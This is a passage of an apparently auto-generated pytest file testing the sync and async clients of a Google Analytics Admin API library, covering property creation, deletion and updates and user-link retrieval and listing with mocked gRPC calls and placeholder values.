        assert args[0] == analytics_admin.CreatePropertyRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Property)
    assert response.name == "name_value"
    assert response.parent == "parent_value"
    assert response.display_name == "display_name_value"
    assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE
    assert response.time_zone == "time_zone_value"
    assert response.currency_code == "currency_code_value"
    assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD


@pytest.mark.asyncio
async def test_create_property_async_from_dict():
    await test_create_property_async(request_type=dict)


def test_create_property_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.create_property), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Property()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_property(property=resources.Property(name="name_value"),)

        # Establish that the underlying call was made with the expected
        # request object values.
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") def test_create_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_property( analytics_admin.CreatePropertyRequest(), property=resources.Property(name="name_value"), ) @pytest.mark.asyncio async def test_create_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.create_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_property( property=resources.Property(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") @pytest.mark.asyncio async def test_create_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.create_property( analytics_admin.CreatePropertyRequest(), property=resources.Property(name="name_value"), ) def test_delete_property( transport: str = "grpc", request_type=analytics_admin.DeletePropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_delete_property_from_dict(): test_delete_property(request_type=dict) def test_delete_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. 
request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: client.delete_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() @pytest.mark.asyncio async def test_delete_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeletePropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeletePropertyRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_delete_property_async_from_dict(): await test_delete_property_async(request_type=dict) def test_delete_property_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeletePropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: call.return_value = resources.Property() client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_property_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeletePropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.delete_property), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) await client.delete_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_property( analytics_admin.DeletePropertyRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_property), "__call__") as call: # Designate an appropriate return value for the call. 
call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_property( analytics_admin.DeletePropertyRequest(), name="name_value", ) def test_update_property( transport: str = "grpc", request_type=analytics_admin.UpdatePropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.update_property(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_update_property_from_dict(): test_update_property(request_type=dict) def test_update_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: client.update_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() @pytest.mark.asyncio async def test_update_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdatePropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdatePropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_update_property_async_from_dict(): await test_update_property_async(request_type=dict) def test_update_property_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdatePropertyRequest() request.property.name = "property.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: call.return_value = resources.Property() client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "property.name=property.name/value",) in kw[ "metadata" ] @pytest.mark.asyncio async def test_update_property_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdatePropertyRequest() request.property.name = "property.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) await client.update_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "property.name=property.name/value",) in kw[ "metadata" ] def test_update_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_property( property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_property( analytics_admin.UpdatePropertyRequest(), property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_property( property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].property == resources.Property(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.update_property( analytics_admin.UpdatePropertyRequest(), property=resources.Property(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_get_user_link( transport: str = "grpc", request_type=analytics_admin.GetUserLinkRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) response = client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] def test_get_user_link_from_dict(): test_get_user_link(request_type=dict) def test_get_user_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: client.get_user_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() @pytest.mark.asyncio async def test_get_user_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetUserLinkRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.UserLink( name="name_value", email_address="email_address_value", direct_roles=["direct_roles_value"], ) ) response = await client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetUserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.UserLink) assert response.name == "name_value" assert response.email_address == "email_address_value" assert response.direct_roles == ["direct_roles_value"] @pytest.mark.asyncio async def test_get_user_link_async_from_dict(): await test_get_user_link_async(request_type=dict) def test_get_user_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: call.return_value = resources.UserLink() client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_user_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetUserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) await client.get_user_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_user_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_user_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_user_link( analytics_admin.GetUserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_user_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_user_link), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.UserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.UserLink()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_user_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_user_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_user_link( analytics_admin.GetUserLinkRequest(), name="name_value", ) def test_batch_get_user_links( transport: str = "grpc", request_type=analytics_admin.BatchGetUserLinksRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.batch_get_user_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.BatchGetUserLinksResponse() response = client.batch_get_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.BatchGetUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.BatchGetUserLinksResponse) def test_batch_get_user_links_from_dict(): test_batch_get_user_links(request_type=dict) def test_batch_get_user_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
    with mock.patch.object(
        type(client.transport.batch_get_user_links), "__call__"
    ) as call:
        # Calling with no arguments must still reach the transport with a
        # default (empty) request object.
        client.batch_get_user_links()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.BatchGetUserLinksRequest()


@pytest.mark.asyncio
async def test_batch_get_user_links_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.BatchGetUserLinksRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_get_user_links), "__call__"
    ) as call:
        # Designate an appropriate return value for the call (wrapped in an
        # awaitable for the async surface).
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.BatchGetUserLinksResponse()
        )
        response = await client.batch_get_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.BatchGetUserLinksRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, analytics_admin.BatchGetUserLinksResponse)


@pytest.mark.asyncio
async def test_batch_get_user_links_async_from_dict():
    await test_batch_get_user_links_async(request_type=dict)


def test_batch_get_user_links_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchGetUserLinksRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_get_user_links), "__call__"
    ) as call:
        call.return_value = analytics_admin.BatchGetUserLinksResponse()
        client.batch_get_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_batch_get_user_links_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.BatchGetUserLinksRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.batch_get_user_links), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.BatchGetUserLinksResponse()
        )
        await client.batch_get_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_list_user_links(
    transport: str = "grpc", request_type=analytics_admin.ListUserLinksRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_user_links), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListUserLinksResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_user_links(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListUserLinksRequest()

    # Establish that the response is the type that we expect: a pager that
    # surfaces the page token from the underlying response.
    assert isinstance(response, pagers.ListUserLinksPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_user_links_from_dict():
    test_list_user_links(request_type=dict)


def test_list_user_links_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_user_links), "__call__") as call:
        client.list_user_links()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListUserLinksRequest()


@pytest.mark.asyncio
async def test_list_user_links_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.ListUserLinksRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.list_user_links), "__call__") as call:
        # Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListUserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListUserLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_user_links_async_from_dict(): await test_list_user_links_async(request_type=dict) def test_list_user_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: call.return_value = analytics_admin.ListUserLinksResponse() client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_user_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListUserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListUserLinksResponse() ) await client.list_user_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_user_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListUserLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_user_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_user_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_user_links( analytics_admin.ListUserLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_user_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_user_links), "__call__") as call: # Designate an appropriate return value for the call. 
